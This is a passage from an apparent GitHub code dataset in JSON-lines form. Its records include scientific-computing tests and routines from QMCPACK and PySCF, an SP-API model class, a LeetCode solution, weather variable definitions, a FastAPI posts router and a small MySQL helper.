morse(p,rfine)\n\n pf = morse_fit(rfine,Efine,p)\n\n pref = tuple(np.array(p,dtype=float))\n pf = tuple(np.array(pf,dtype=float))\n\n assert(value_eq(pf,pref))\n\n pf,Ef = morse_fit_fine(rfine,Efine,p,rfine,both=True)\n pf = tuple(np.array(pf,dtype=float))\n assert(value_eq(pf,pref))\n assert(value_eq(Ef,Efine))\n #end def test_morse_fit\n#end if\n\n\n\n\ndef test_eos():\n import numpy as np\n from testing import value_eq\n from unit_converter import convert\n from numerics import eos_fit,eos_eval,eos_param\n\n data = np.array([\n [0.875, -83.31851261], \n [0.900, -83.38085214], \n [0.925, -83.42172843], \n [0.950, -83.44502216], \n [0.975, -83.45476035], \n [1.025, -83.44564229], \n [1.050, -83.43127254], \n [1.000, -83.45412846], \n [1.100, -83.39070714], \n [1.125, -83.36663810], \n ])\n\n a = 5.539 # lattice constant\n\n V = (a*data[:,0])**3\n E = convert(data[:,1],'Ry','eV')\n\n # done originally to get params below\n #pf = eos_fit(V,E,'vinet')\n\n Einf = -1.13547294e+03\n V0 = 1.62708941e+02\n B0 = 1.34467867e-01\n Bp0 = 4.55846963e+00\n\n pf = Einf,V0,B0,Bp0\n\n Ef = eos_eval(pf,V,'vinet')\n\n assert(value_eq(Ef,E,atol=4e-3))\n\n assert(value_eq(float(eos_param(pf,'Einf','vinet')),Einf))\n assert(value_eq(float(eos_param(pf,'V','vinet')),V0))\n assert(value_eq(float(eos_param(pf,'B','vinet')),B0))\n assert(value_eq(float(eos_param(pf,'Bp','vinet')),Bp0))\n#end def test_eos\n\n\n\nif scipy_available:\n def test_eos_fit():\n import numpy as np\n from testing import value_eq\n from unit_converter import convert\n from numerics import eos_fit,eos_eval,eos_param\n\n data = np.array([\n [0.875, -83.31851261], \n [0.900, -83.38085214], \n [0.925, -83.42172843], \n [0.950, -83.44502216], \n [0.975, -83.45476035], \n [1.025, -83.44564229], \n [1.050, -83.43127254], \n [1.000, -83.45412846], \n [1.100, -83.39070714], \n [1.125, -83.36663810], \n ])\n\n a = 5.539 # lattice constant\n\n V = (a*data[:,0])**3\n E = convert(data[:,1],'Ry','eV')\n\n # done originally to get params below\n #pf = eos_fit(V,E,'vinet')\n\n Einf = -1.13547294e+03\n V0 = 1.62708941e+02\n B0 = 1.34467867e-01\n Bp0 = 4.55846963e+00\n\n pf = Einf,V0,B0,Bp0\n\n Ef = eos_eval(pf,V,'vinet')\n\n pf2 = eos_fit(V,Ef,'vinet')\n\n pf = np.array(pf,dtype=float)\n pf2 = np.array(pf2,dtype=float)\n\n assert(value_eq(pf,pf2,atol=1e-3))\n #end def test_eos_fit\n#end if\n","repo_name":"QMCPACK/qmcpack","sub_path":"nexus/tests/unit/test_numerics.py","file_name":"test_numerics.py","file_ext":"py","file_size_in_byte":16316,"program_lang":"python","lang":"en","doc_type":"code","stars":261,"dataset":"github-code","pt":"21"} +{"seq_id":"33899291543","text":"from typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar, Union\n\nimport attr\n\nfrom ..models.offer_customer_type import OfferCustomerType\nfrom ..models.quantity_discount_type import QuantityDiscountType\nfrom ..types import UNSET, Unset\n\nif TYPE_CHECKING:\n from ..models.price_type import PriceType\n\n\nT = TypeVar(\"T\", bound=\"CompetitivePriceType\")\n\n\n@attr.s(auto_attribs=True)\nclass CompetitivePriceType:\n r\"\"\"\n Attributes:\n competitive_price_id (str): The pricing model for each price that is returned.\n\n Possible values:\n\n * 1 - New Buy Box Price.\n * 2 - Used Buy Box Price.\n price (PriceType):\n condition (Union[Unset, str]): Indicates the condition of the item whose pricing information is returned.\n Possible values are: New, Used, Collectible, Refurbished, or Club.\n subcondition (Union[Unset, str]): Indicates the subcondition of the item whose pricing information is returned.\n Possible values are: New, Mint, Very Good, Good, Acceptable, Poor, Club, OEM, Warranty, Refurbished Warranty,\n Refurbished, Open Box, or Other.\n offer_type (Union[Unset, OfferCustomerType]):\n quantity_tier (Union[Unset, int]): Indicates at what quantity this price becomes active.\n quantity_discount_type (Union[Unset, QuantityDiscountType]):\n seller_id (Union[Unset, str]): The seller identifier for the offer.\n belongs_to_requester (Union[Unset, bool]): Indicates whether or not the pricing information is for an offer\n listing that belongs to the requester. The requester is the seller associated with the SellerId that was\n submitted with the request. Possible values are: true and false.\n \"\"\"\n\n competitive_price_id: str\n price: \"PriceType\"\n condition: Union[Unset, str] = UNSET\n subcondition: Union[Unset, str] = UNSET\n offer_type: Union[Unset, OfferCustomerType] = UNSET\n quantity_tier: Union[Unset, int] = UNSET\n quantity_discount_type: Union[Unset, QuantityDiscountType] = UNSET\n seller_id: Union[Unset, str] = UNSET\n belongs_to_requester: Union[Unset, bool] = UNSET\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n competitive_price_id = self.competitive_price_id\n price = self.price.to_dict()\n\n condition = self.condition\n subcondition = self.subcondition\n offer_type: Union[Unset, str] = UNSET\n if not isinstance(self.offer_type, Unset):\n offer_type = self.offer_type.value\n\n quantity_tier = self.quantity_tier\n quantity_discount_type: Union[Unset, str] = UNSET\n if not isinstance(self.quantity_discount_type, Unset):\n quantity_discount_type = self.quantity_discount_type.value\n\n seller_id = self.seller_id\n belongs_to_requester = self.belongs_to_requester\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update(\n {\n \"CompetitivePriceId\": competitive_price_id,\n \"Price\": price,\n }\n )\n if condition is not UNSET:\n field_dict[\"condition\"] = condition\n if subcondition is not UNSET:\n field_dict[\"subcondition\"] = subcondition\n if offer_type is not UNSET:\n field_dict[\"offerType\"] = offer_type\n if quantity_tier is not UNSET:\n field_dict[\"quantityTier\"] = quantity_tier\n if quantity_discount_type is not UNSET:\n field_dict[\"quantityDiscountType\"] = quantity_discount_type\n if seller_id is not UNSET:\n field_dict[\"sellerId\"] = seller_id\n if belongs_to_requester is not UNSET:\n field_dict[\"belongsToRequester\"] = belongs_to_requester\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n from ..models.price_type import PriceType\n\n d = src_dict.copy()\n competitive_price_id = d.pop(\"CompetitivePriceId\")\n\n price = PriceType.from_dict(d.pop(\"Price\"))\n\n condition = d.pop(\"condition\", UNSET)\n\n subcondition = d.pop(\"subcondition\", UNSET)\n\n _offer_type = d.pop(\"offerType\", UNSET)\n offer_type: Union[Unset, OfferCustomerType]\n if isinstance(_offer_type, Unset):\n offer_type = UNSET\n else:\n offer_type = OfferCustomerType(_offer_type)\n\n quantity_tier = d.pop(\"quantityTier\", UNSET)\n\n _quantity_discount_type = d.pop(\"quantityDiscountType\", UNSET)\n quantity_discount_type: Union[Unset, QuantityDiscountType]\n if isinstance(_quantity_discount_type, Unset):\n quantity_discount_type = UNSET\n else:\n quantity_discount_type = QuantityDiscountType(_quantity_discount_type)\n\n seller_id = d.pop(\"sellerId\", UNSET)\n\n belongs_to_requester = d.pop(\"belongsToRequester\", UNSET)\n\n result = cls(\n competitive_price_id=competitive_price_id,\n price=price,\n condition=condition,\n subcondition=subcondition,\n offer_type=offer_type,\n quantity_tier=quantity_tier,\n quantity_discount_type=quantity_discount_type,\n seller_id=seller_id,\n belongs_to_requester=belongs_to_requester,\n )\n\n result.additional_properties = d\n return result\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"milyord/sp-api","sub_path":"sp/product_pricing_v0/models/competitive_price_type.py","file_name":"competitive_price_type.py","file_ext":"py","file_size_in_byte":5961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2702441737","text":"#!/usr/bin/env python\n#\n# Author: Qiming Sun \n#\n\n'''\nJK with discrete Fourier transformation\n'''\n\nimport numpy as np\nfrom pyscf import lib\nfrom pyscf.lib import logger\nfrom pyscf.pbc import tools\nfrom pyscf.pbc.dft import gen_grid\nfrom pyscf.pbc.dft import numint\n\n\ndef get_j_kpts(mydf, dm_kpts, hermi=1, kpts=np.zeros((1,3)), kpt_band=None):\n '''Get the Coulomb (J) AO matrix at sampled k-points.\n\n Args:\n dm_kpts : (nkpts, nao, nao) ndarray or a list of (nkpts,nao,nao) ndarray\n Density matrix at each k-point. If a list of k-point DMs, eg,\n UHF alpha and beta DM, the alpha and beta DMs are contracted\n separately.\n kpts : (nkpts, 3) ndarray\n\n Kwargs:\n kpt_band : (3,) ndarray\n An arbitrary \"band\" k-point at which to evalute the matrix.\n\n Returns:\n vj : (nkpts, nao, nao) ndarray\n or list of vj if the input dm_kpts is a list of DMs\n '''\n cell = mydf.cell\n gs = mydf.gs\n\n dm_kpts = lib.asarray(dm_kpts, order='C')\n dms = _format_dms(dm_kpts, kpts)\n nset, nkpts, nao = dms.shape[:3]\n\n coulG = tools.get_coulG(cell, gs=gs)\n ngs = len(coulG)\n\n vR = rhoR = np.zeros((nset,ngs))\n for k, aoR in mydf.aoR_loop(cell, gs, kpts):\n for i in range(nset):\n rhoR[i] += numint.eval_rho(cell, aoR, dms[i,k])\n for i in range(nset):\n rhoR[i] *= 1./nkpts\n rhoG = tools.fft(rhoR[i], gs)\n vG = coulG * rhoG\n vR[i] = tools.ifft(vG, gs).real\n\n if kpt_band is not None:\n for k, aoR_kband in mydf.aoR_loop(cell, gs, kpts, kpt_band):\n pass\n vj_kpts = [cell.vol/ngs * lib.dot(aoR_kband.T.conj()*vR[i], aoR_kband)\n for i in range(nset)]\n if dm_kpts.ndim == 3: # One set of dm_kpts for KRHF\n vj_kpts = vj_kpts[0]\n return lib.asarray(vj_kpts)\n else:\n vj_kpts = []\n weight = cell.vol / ngs\n for k, aoR in mydf.aoR_loop(cell, gs, kpts):\n for i in range(nset):\n vj_kpts.append(weight * lib.dot(aoR.T.conj()*vR[i], aoR))\n vj_kpts = lib.asarray(vj_kpts).reshape(nkpts,nset,nao,nao)\n return vj_kpts.transpose(1,0,2,3).reshape(dm_kpts.shape)\n\ndef get_k_kpts(mydf, dm_kpts, hermi=1, kpts=np.zeros((1,3)), kpt_band=None,\n exxdiv=None):\n '''Get the Coulomb (J) and exchange (K) AO matrices at sampled k-points.\n\n Args:\n dm_kpts : (nkpts, nao, nao) ndarray\n Density matrix at each k-point\n kpts : (nkpts, 3) ndarray\n\n Kwargs:\n kpt_band : (3,) ndarray\n An arbitrary \"band\" k-point at which to evalute the matrix.\n\n Returns:\n vj : (nkpts, nao, nao) ndarray\n vk : (nkpts, nao, nao) ndarray\n or list of vj and vk if the input dm_kpts is a list of DMs\n '''\n cell = mydf.cell\n gs = mydf.gs\n coords = gen_grid.gen_uniform_grids(cell, gs)\n ngs = coords.shape[0]\n\n kpts = np.asarray(kpts)\n dm_kpts = lib.asarray(dm_kpts, order='C')\n dms = _format_dms(dm_kpts, kpts)\n nset, nkpts, nao = dms.shape[:3]\n\n weight = 1./nkpts * (cell.vol/ngs)\n\n if kpt_band is not None:\n for k, aoR_kband in mydf.aoR_loop(cell, gs, kpts, kpt_band):\n pass\n vk_kpts = [0] * nset\n for k2, ao_k2 in mydf.aoR_loop(cell, gs, kpts):\n kpt2 = kpts[k2]\n vkR_k1k2 = get_vkR(mydf, cell, aoR_kband, ao_k2, kpt_band, kpt2,\n coords, gs, exxdiv)\n #:vk_kpts = 1./nkpts * (cell.vol/ngs) * np.einsum('rs,Rp,Rqs,Rr->pq',\n #: dm_kpts[k2], aoR_kband.conj(), vkR_k1k2, ao_k2)\n for i in range(nset):\n aoR_dm = lib.dot(ao_k2, dms[i,k2])\n tmp_Rq = np.einsum('Rqs,Rs->Rq', vkR_k1k2, aoR_dm)\n vk_kpts[i] += weight * lib.dot(aoR_kband.T.conj(), tmp_Rq)\n vkR_k1k2 = aoR_dm = tmp_Rq = None\n if dm_kpts.ndim == 3:\n vk_kpts = vk_kpts[0]\n return lib.asarray(vk_kpts)\n else:\n if abs(kpts).sum() < 1e-9:\n vk_kpts = np.zeros((nset,nkpts,nao,nao), dtype=dms.dtype)\n else:\n vk_kpts = np.zeros((nset,nkpts,nao,nao), dtype=np.complex128)\n for k2, ao_k2 in mydf.aoR_loop(cell, gs, kpts):\n kpt2 = kpts[k2]\n aoR_dms = [lib.dot(ao_k2, dms[i,k2]) for i in range(nset)]\n for k1, ao_k1 in mydf.aoR_loop(cell, gs, kpts):\n kpt1 = kpts[k1]\n vkR_k1k2 = get_vkR(mydf, cell, ao_k1, ao_k2, kpt1, kpt2,\n coords, gs, exxdiv)\n for i in range(nset):\n tmp_Rq = np.einsum('Rqs,Rs->Rq', vkR_k1k2, aoR_dms[i])\n vk_kpts[i,k1] += weight * lib.dot(ao_k1.T.conj(), tmp_Rq)\n vkR_k1k2 = aoR_dms = tmp_Rq = None\n return vk_kpts.reshape(dm_kpts.shape)\n\n\ndef get_jk(mydf, dm, hermi=1, kpt=np.zeros(3), kpt_band=None):\n '''Get the Coulomb (J) and exchange (K) AO matrices for the given density matrix.\n\n Args:\n dm : ndarray or list of ndarrays\n A density matrix or a list of density matrices\n\n Kwargs:\n hermi : int\n Whether J, K matrix is hermitian\n | 0 : no hermitian or symmetric\n | 1 : hermitian\n | 2 : anti-hermitian\n kpt : (3,) ndarray\n The \"inner\" dummy k-point at which the DM was evaluated (or\n sampled).\n kpt_band : (3,) ndarray\n The \"outer\" primary k-point at which J and K are evaluated.\n\n Returns:\n The function returns one J and one K matrix, corresponding to the input\n density matrix (both order and shape).\n '''\n dm = np.asarray(dm, order='C')\n vj = get_j(mydf, dm, hermi, kpt, kpt_band)\n vk = get_k(mydf, dm, hermi, kpt, kpt_band)\n return vj, vk\n\ndef get_j(mydf, dm, hermi=1, kpt=np.zeros(3), kpt_band=None):\n '''Get the Coulomb (J) AO matrix for the given density matrix.\n\n Args:\n dm : ndarray or list of ndarrays\n A density matrix or a list of density matrices\n\n Kwargs:\n hermi : int\n Whether J, K matrix is hermitian\n | 0 : no hermitian or symmetric\n | 1 : hermitian\n | 2 : anti-hermitian\n kpt : (3,) ndarray\n The \"inner\" dummy k-point at which the DM was evaluated (or\n sampled).\n kpt_band : (3,) ndarray\n The \"outer\" primary k-point at which J and K are evaluated.\n\n Returns:\n The function returns one J matrix, corresponding to the input\n density matrix (both order and shape).\n '''\n dm = np.asarray(dm, order='C')\n nao = dm.shape[-1]\n dm_kpts = dm.reshape(-1,1,nao,nao)\n vj = get_j_kpts(mydf, dm_kpts, hermi, [kpt], kpt_band)\n return vj.reshape(dm.shape)\n\ndef get_k(mydf, dm, hermi=1, kpt=np.zeros(3), kpt_band=None, exxdiv=None):\n '''Get the Coulomb (J) and exchange (K) AO matrices for the given density matrix.\n\n Args:\n dm : ndarray or list of ndarrays\n A density matrix or a list of density matrices\n\n Kwargs:\n hermi : int\n Whether J, K matrix is hermitian\n | 0 : no hermitian or symmetric\n | 1 : hermitian\n | 2 : anti-hermitian\n kpt : (3,) ndarray\n The \"inner\" dummy k-point at which the DM was evaluated (or\n sampled).\n kpt_band : (3,) ndarray\n The \"outer\" primary k-point at which J and K are evaluated.\n\n Returns:\n The function returns one J and one K matrix, corresponding to the input\n density matrix (both order and shape).\n '''\n dm = np.asarray(dm, order='C')\n nao = dm.shape[-1]\n dm_kpts = dm.reshape(-1,1,nao,nao)\n vk = get_k_kpts(mydf, dm_kpts, hermi, [kpt], kpt_band, exxdiv)\n return vk.reshape(dm.shape)\n\n\ndef get_vkR(mydf, cell, aoR_k1, aoR_k2, kpt1, kpt2, coords, gs, exxdiv):\n '''Get the real-space 2-index \"exchange\" potential V_{i,k1; j,k2}(r)\n where {i,k1} = exp^{i k1 r) |i> , {j,k2} = exp^{-i k2 r) int:\n n = len(dist)\n # dp[i][j] := minimum time to travel the roads where i := last road index (1-base) and j := number of skips\n dp = [[sys.maxsize for _ in range(n + 1)] for _ in range(n + 1)]\n dp[0][0] = 0\n\n for index, distance in enumerate(dist, 1):\n # use round to eliminate inaccuracies caused by float\n # also note that no need do skip for last road\n dp[index][0] = math.ceil(round(dp[index - 1][0] + distance / speed, 7)) if index < len(dist) else dp[index - 1][0] + distance / speed\n for skips in range(1, index + 1):\n if index < len(dist):\n do_skip_time = dp[index - 1][skips - 1] + distance / speed\n no_skip_time = math.ceil(round(dp[index - 1][skips] + distance / speed, 7))\n else:\n do_skip_time = no_skip_time = dp[index - 1][skips] + distance / speed\n dp[index][skips] = min(do_skip_time, no_skip_time)\n\n for skips, time in enumerate(dp[-1]):\n if time <= hoursBefore:\n return skips\n return -1\n","repo_name":"DaMinaup6/algorithm-exercises","sub_path":"leetcode/hard/1883_minimum_skips_to_arrive_at_meeting_on_time.py","file_name":"1883_minimum_skips_to_arrive_at_meeting_on_time.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40684057961","text":"from ykbl import RetalJaloj\n\netabälqij = RetalJaloj(\n {\"Kaqchikel\": \"Etab'äl qi'j\", \"español\": \"Radiación Solar\"}, kulbat=(0, None), junilal=\"W/(m*m)\"\n)\nnïm_etabälqij = RetalJaloj(\n {\"Kaqchikel\": \"Nïm etabälqij\", \"español\": \"Radiación Solar Maximal\"}, kulbat=(0, None), junilal=\"W/(m*m)\"\n)\nnïm_tewkatanil = RetalJaloj(\n {\"Kaqchikel\": \"Nïm tewk'atanil\", \"español\": \"Temperatura Maximal\"}, kulbat=(None, None), junilal=\"°C\"\n)\nkoöl_tewkatanil = RetalJaloj(\n {\"Kaqchikel\": \"Ko'öl tewk’atanil \", \"español\": \"Temperatura Minimal\"}, kulbat=(None, None), junilal=\"°C\"\n)\ncholajil_tewkatanil = RetalJaloj(\n {\"Kaqchikel\": \"Cholajil tewk'atanil\", \"español\": \"Temperatura Prom.\"}, kulbat=(None, None), junilal=\"°C\"\n)\netabälräxkaqïq = RetalJaloj(\n {\"Kaqchikel\": \"Etab'äl räx kaq’ïq\", \"español\": \"Humedad\"}, kulbat=(0, 100), junilal=\"%\"\n)\netabälMetzetelSaqil = RetalJaloj(\n {\"Kaqchikel\": \"Etab'äl metz’etel saqil\", \"español\": \"Indice UV\"}, kulbat=(0, None), junilal=\"Unid\"\n)\nnïm_etabälMetzetelSaqil = RetalJaloj(\n {\"Kaqchikel\": \"Etab'äl metz'etel saqil nïm\", \"español\": \"Indice UV Mayor\"}, kulbat=(0, None), junilal=\"Unid\"\n)\nnïm_ochochibälKaqïq = RetalJaloj(\n {\"Kaqchikel\": \"Ochochib’äl nïm kaq'ïq'\", \"español\": \"Dirección Viento Max\"}, kulbat=(0, None), junilal=\"NESW\"\n)\n\nnïm_aninemKaqïq = RetalJaloj(\n {\"Kaqchikel\": \"Nïm aninem kaq'ïq'\", \"español\": \"Velocidad Viento Maximal\"}, kulbat=(0, None), junilal=\"km/h\"\n)\nprecipitación = RetalJaloj(\n {\"Kaqchikel\": \"ask julien\", \"español\": \"Precipitación\"}, kulbat=(0, None), junilal=\"mm\"\n)\n\nnevada = RetalJaloj(\n {\"Kaqchikel\": \"ask julien\", \"español\": \"Nevada\"}, kulbat=(0, None), junilal=\"mm\"\n)\n\ntzujalchirijulew = RetalJaloj(\n {\"Kaqchikel\": \"Tz'ujal chirij ulew\", \"español\": \"Escorrentía\"}, kulbat=(0, None), junilal=\"mm\"\n)\njab = RetalJaloj(\n {\"Kaqchikel\": \"Jab'\", \"español\": \"Lluvia\"},\n kulbat=(0, None), junilal=\"mm\"\n)\nkichelaj = RetalJaloj(\n {\"Kaqchikel\": \"K'ichelaj\", \"español\": \"Bosque\"},\n kulbat=(0, None), junilal='ha'\n)\nche = RetalJaloj(\n {\"Kaqchikel\": \"Che'\", \"español\": \"Árboles\"},\n kulbat=(0, None), junilal='ha'\n)\ntikon = RetalJaloj(\n {\"Kaqchikel\": \"Tiko'n\", \"Tz'utujil\": \"Tijko'n\", \"español\": \"Árboles\"},\n kulbat=(0, None), junilal='ha'\n)\nkokoltaqche = RetalJaloj(\n {\"Kaqchikel\": \"Kok'ol taq che'\", \"español\": \"Arbustales\"},\n kulbat=(0, None), junilal='ha'\n)\n\nruwächqij_retal_jaloj_DICA_AMSCLAE = [koöl_tewkatanil, cholajil_tewkatanil, nïm_tewkatanil, etabälräxkaqïq, precipitación, etabälqij,\n nïm_etabälqij, etabälMetzetelSaqil, nïm_ochochibälKaqïq, nïm_aninemKaqïq, nïm_aninemKaqïq]\n\ntaq_retal_jaloj = [tzujalchirijulew, jab, kichelaj, che, tikon, kokoltaqche]\n","repo_name":"marcoramirez21/Yikbalruxetzijnaoj","sub_path":"atitlán/rtljlj.py","file_name":"rtljlj.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42737843543","text":"from fastapi import APIRouter, Depends, FastAPI, status, Response, HTTPException\nfrom sqlalchemy import func\n\nfrom ..database import get_db\nfrom typing import List, Optional\nfrom .. import schemas \nfrom .. import models\nfrom .. import oath2\nfrom sqlalchemy.orm import Session\n\nrouter = APIRouter(prefix = '/posts', tags = ['POSTS'])\n \n@router.get('/', response_model= List[schemas.PostOut])\ndef get_all_posts(db: Session = Depends(get_db), current_user: models.User = Depends(oath2.get_current_user), \n limit: int = 10, skip: int = 0, search: Optional[str] = \"\"):\n # cursor.execute(\"\"\" SELECT * FROM posts\"\"\")\n # posts = cursor.fetchall()\n # # code to serialize the post object of db to dictionary\n # columnNames = [column[0] for column in cursor.description]\n # lst = []\n # for post in posts:\n # lst.append( dict( zip( columnNames , post)))\n \n # return lst\n posts = db.query(models.Post, func.count(models.Vote.post_id).label(\"votes\")).join(\n models.Vote, models.Vote.post_id == models.Post.id, isouter=True).group_by(models.Post.id).filter(models.Post.title.contains(search)).limit(limit = limit).offset(skip).all()\n \n # print(posts)\n return posts\n\n\n@router.get('/{id}', response_model= schemas.PostOut)\ndef get_post(id: int, db: Session = Depends(get_db), current_user: models.User = Depends(oath2.get_current_user)):\n # cursor.execute(\"\"\" SELECT * FROM posts WHERE ID = %s\"\"\",(str(id),)) # used %s because of fear of sql injections \n # post = cursor.fetchone()\n # if not post:\n # raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"post with id: {id} was not found\")\n \n # # code to serialize the post object of db to dictionary\n # columnNames = [column[0] for column in cursor.description]\n # post = dict(zip( columnNames , post ))\n \n # return post \n \n # post_query = db.query(models.Post, func.count(models.Vote.post_id).label(\"votes\")).join(models.Vote, models.Vote.post_id == models.Post.id, isouter=True).group_by(models.Post.id).filter(models.Post.id == id)\n post_query = db.query(models.Post, func.count(models.Vote.post_id).label(\"votes\")).join(\n models.Vote, models.Vote.post_id == models.Post.id, isouter=True).group_by(models.Post.id).filter(models.Post.id == id)\n\n post = post_query.first()\n # NOTE THE OBJECT RETURNED IS (MODELS.POST object, votes) its a tuple not an object \n # so postout needs to have object and vote \n if not post:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"post with id: {id} was not found-------\")\n \n return post\n\n@router.post('/', status_code= status.HTTP_201_CREATED, response_model= schemas.Post)\ndef create(post: schemas.PostCreate, db: Session = Depends(get_db), current_user: models.User = Depends(oath2.get_current_user)):\n # cursor.execute(\"\"\" INSERT INTO posts (title, content, published) VALUES (%s, %s, %s) RETURNING *\"\"\",(post.title, post.content, post.published))\n # new_post = cursor.fetchone()\n # conn.commit()\n # # code to serialize the post object of db to dictionary\n # columnNames = [column[0] for column in cursor.description]\n # new_post = dict(zip( columnNames , new_post ))\n \n # return new_post\n # print(type(current_user))\n new_post = models.Post(**post.dict(), owner_id = current_user.id) # ** is used for converting dictionary to usable form \n db.add(new_post)\n db.commit()\n # used to return new post\n db.refresh(new_post)\n return new_post\n\n@router.put('/{id}', response_model= schemas.Post)\ndef update(id: int, post: schemas.PostCreate, db: Session = Depends(get_db), current_user: models.User = Depends(oath2.get_current_user)):\n # cursor.execute(\"\"\" UPDATE posts SET title = %s, content= %s, published = %s WHERE id = %s RETURNING * \"\"\",(post.title, post.content, post.published, str(id),))\n # updated_post = cursor.fetchone()\n # if not updated_post:\n # raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"post with id: {id} was not found\")\n # conn.commit()\n \n # # code to serialize the post object of db to dictionary\n # columnNames = [column[0] for column in cursor.description]\n # updated_post = dict(zip( columnNames , updated_post ))\n \n # return updated_post\n \n post_query = db.query(models.Post).filter(models.Post.id == id)\n \n update_post = post_query.first()\n \n if not update_post:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"post with id: {id} was not found\")\n \n if current_user.id != update_post.owner_id:\n raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=\"Not authurized to perform this action\")\n \n post_query.update(post.dict(), synchronize_session= False)\n \n db.commit()\n \n return post_query.first()\n\n@router.delete('/{id}', status_code = status.HTTP_204_NO_CONTENT)\ndef delete(id: int, db: Session = Depends(get_db), current_user: models.User = Depends(oath2.get_current_user)):\n # cursor.execute(\"\"\" DELETE FROM posts WHERE id = %s returning *\"\"\",(str(id),))\n # deleted_post = cursor.fetchone()\n # if not deleted_post:\n # raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"post with id: {id} was not found\")\n # conn.commit()\n # return Response(status_code=status.HTTP_204_NO_CONTENT)\n post_query = db.query(models.Post).filter(models.Post.id == id)\n \n post = post_query.first()\n \n if not post:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"post with id: {id} was not found\")\n \n if current_user.id != post.owner_id:\n raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=\"Not authurized to perform this action\")\n \n post_query.delete(synchronize_session= False)\n \n db.commit()\n \n return Response(status_code=status.HTTP_204_NO_CONTENT)\n","repo_name":"shivankur-code/fastapi-project","sub_path":"app/routers/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":5914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17122797367","text":"#! /usr/bin/env python\n# coding = utf-8\nimport pymysql\n\n\nclass MySQLHelper(object):\n\n def __init__(self, host='localhost', db='tatel'):\n self.__host = host\n self.__db = db\n # self.__cursor_class = cursor_class\n self.__Conn = pymysql.Connection(host=self.__host, user='root',password='1234', db=self.__db,)\n\n def get_one(self, sql, params):\n try:\n cursor = self.__Conn.cursor()\n cursor.execute(sql, params)\n data = cursor.fetchone()\n cursor.close()\n return data\n except Exception as e:\n print('get_one() ,Error:', e)\n\n def get_all(self, sql, params):\n try:\n cursor = self.__Conn.cursor()\n cursor.execute(sql, params)\n data = cursor.fetchall()\n cursor.close()\n return data\n except Exception as e:\n print('get_all() Error', e)\n\n def insert_into(self, sql, params):\n try:\n cursor = self.__Conn.cursor()\n cursor.execute(sql, params)\n self.__Conn.commit()\n cursor.close()\n except Exception as e:\n self.__Conn.rollback()\n print(e)\n else:\n return 1\n\n def original_execute(self, sql):\n try:\n cursor = self.__Conn.cursor()\n cursor.execute(sql)\n self.__Conn.commit()\n cursor.close()\n return 1\n except Exception as e:\n self.__Conn.rollback()\n print(e)\n\n def __del__(self):\n self.__Conn.close()\n\nif __name__ == '__main__':\n helper = MySQLHelper()\n # sql = '''create table user(id INT , username VARCHAR (20));'''\n # helper.original_execute(sql)\n sql = '''select * from user'''\n helper.original_execute(sql)\n","repo_name":"TatelZhang/SomeCode","sub_path":"Daily/0629/sql_class.py","file_name":"sql_class.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25850733527","text":"import pickle\nimport os\nimport numpy as np\n\ndata_source = '/home/erik/Github/exjobb_resultat/data/'\n\n\ndef load_specific_score(filename = None, dataset = None, algorithm = None):\n # assert dataset in (\"prosivic\", \"dreyeve\")\n # assert algorithm in (\"DSVDD\", \"GPND\", \"ALOCC\")\n if filename is None:\n filepath = os.path.join(data_source,\"%s_%s.pkl\"%(dataset, algorithm))\n else:\n filepath = os.path.join(data_source,filename)\n try:\n with open(filepath,'rb') as f:\n scores, labels = pickle.load(f)\n except:\n with open(filepath,'rb') as f:\n scores, labels = pickle.load(f, encoding='latin1')\n\n return scores, labels\n\ndef load_all_scores():\n print(\"Loading all results\")\n results = {}\n key_it = 0\n for filename in os.listdir(data_source):\n if \".pkl\" in filename:\n tags = filename.replace('.pkl','').split(\"_\")\n dataset = tags[0]\n algorithm = tags[1]\n outlier_name = tags[-1]\n alg_spec_name = tags[2]\n\n print(\"Result %d: dataset %s, algorithm %s, outliers are %s, name %s\"%(key_it,dataset,algorithm,outlier_name,alg_spec_name))\n key = \"result%d\"%key_it\n results[key] = {}\n results[key][\"dataset\"] = dataset\n results[key][\"algorithm\"] = algorithm\n results[key][\"outlier_name\"] = outlier_name\n scores, labels = load_specific_score(filename = filename)\n labels = np.array([np.int(x) for x in labels])\n results[key][\"scores\"] = scores\n results[key][\"labels\"] = labels\n print(\"Successfully loaded results for {:<10} : {:<15}\".format(dataset, algorithm))\n key_it += 1\n\n# def load_all_scores():\n# print(\"Loading all results\")\n# results = {}\n# key_it = 0\n# common_results_dict = pickle.load(open('/home/erik/Github/exjobb_resultat/data/name_dict.pkl','rb'))\n# for i_dataset, experiments in common_results_dict.items():\n# for i_algorithm, experiment in experiments.items():\n# key = \"result%d\"%key_it\n# results[key] = {}\n# results[key][\"dataset\"] = i_dataset\n# results[key][\"algorithm\"] = i_algorithm\n\n# scores, 